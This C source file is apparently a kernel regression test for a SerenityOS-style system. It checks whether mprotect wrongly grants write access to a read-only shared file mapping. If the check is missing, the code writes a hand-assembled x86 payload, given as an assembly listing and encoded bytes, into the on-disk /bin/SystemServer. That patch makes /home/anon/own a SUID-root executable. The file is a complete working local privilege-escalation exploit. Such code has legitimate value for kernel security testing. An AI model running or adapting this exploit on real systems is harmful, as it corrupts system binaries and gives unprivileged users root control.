1#include <AK/Types.h>
2#include <fcntl.h>
3#include <stdio.h>
4#include <string.h>
5#include <sys/mman.h>
6#include <unistd.h>
7
// Regression check for a mapping-permission bug: a MAP_SHARED mapping of a
// file opened O_RDONLY must not become writable through mprotect(). If the
// kernel allows it, the memcpy() at the end writes through the shared mapping
// into the on-disk /bin/SystemServer image (see the payload note below).
//
// Exit status: 0 and "ok" on stdout only when open(), mmap() and mprotect()
// all succeeded — i.e. when the kernel failed to enforce the check; 1 on the
// first failing syscall. The file descriptor and the mapping are never
// released explicitly; process exit reclaims both.
int main()
{
    // Read-only descriptor: the writability of any shared mapping created
    // from it should be bounded by this open mode.
    int fd = open("/bin/SystemServer", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    // 16384 bytes from file offset 0 covers the 0x3111 offset patched below.
    // The same size is repeated in the mprotect() call — keep them in sync.
    u8* ptr = (u8*)mmap(nullptr, 16384, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);
    if (ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    // The security-relevant step: for a shared mapping backed by a descriptor
    // not opened for writing, POSIX requires mprotect(PROT_WRITE) to fail with
    // EACCES. A kernel with the check in place exits here with "mprotect"
    // on stderr; reaching the memcpy() below means the check is missing.
    if (mprotect(ptr, 16384, PROT_READ | PROT_WRITE) < 0) {
        perror("mprotect");
        return 1;
    }

    /*
     *
     * This payload replaces the start of sigchld_handler in the /bin/SystemServer file.
     * It does two things:
     *
     * chown ("/home/anon/own", 0, 0);
     * chmod ("/home/anon/own", 04755);
     *
     * In other words, it turns "/home/anon/own" into a SUID-root executable! :^)
     *
     */

#if 0
    [bits 32]
    [org 0x0804b111]
    jmp $+17
    path:
    db "/home/anon/own", 0
    mov eax, 79
    mov edx, path
    mov ecx, 0
    mov ebx, 0
    int 0x82
    mov eax, 67
    mov edx, path
    mov ecx, 15
    mov ebx, 2541
    int 0x82
    ret
#endif

    // Byte-for-byte encoding of the listing in the #if 0 block above; the
    // 0x0804b113 operand is the address of the `path` label under that org.
    const u8 payload[] = {
        0xeb, 0x0f, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x61, 0x6e, 0x6f,
        0x6e, 0x2f, 0x6f, 0x77, 0x6e, 0x00, 0xb8, 0x4f, 0x00, 0x00, 0x00,
        0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xbb,
        0x00, 0x00, 0x00, 0x00, 0xcd, 0x82, 0xb8, 0x43, 0x00, 0x00, 0x00,
        0xba, 0x13, 0xb1, 0x04, 0x08, 0xb9, 0x0f, 0x00, 0x00, 0x00, 0xbb,
        0xed, 0x09, 0x00, 0x00, 0xcd, 0x82, 0xc3
    };

    // 0x3111 is the file offset of sigchld_handler per the note above; the
    // listing's org (0x0804b111) is presumably that offset plus the image's
    // load base — TODO confirm against the binary. Because the mapping is
    // MAP_SHARED, this store is what reaches the file. Nothing here verifies
    // that the write actually landed.
    memcpy(&ptr[0x3111], payload, sizeof(payload));

    // "ok" therefore means the kernel let a read-only file be modified.
    printf("ok\n");
    return 0;
}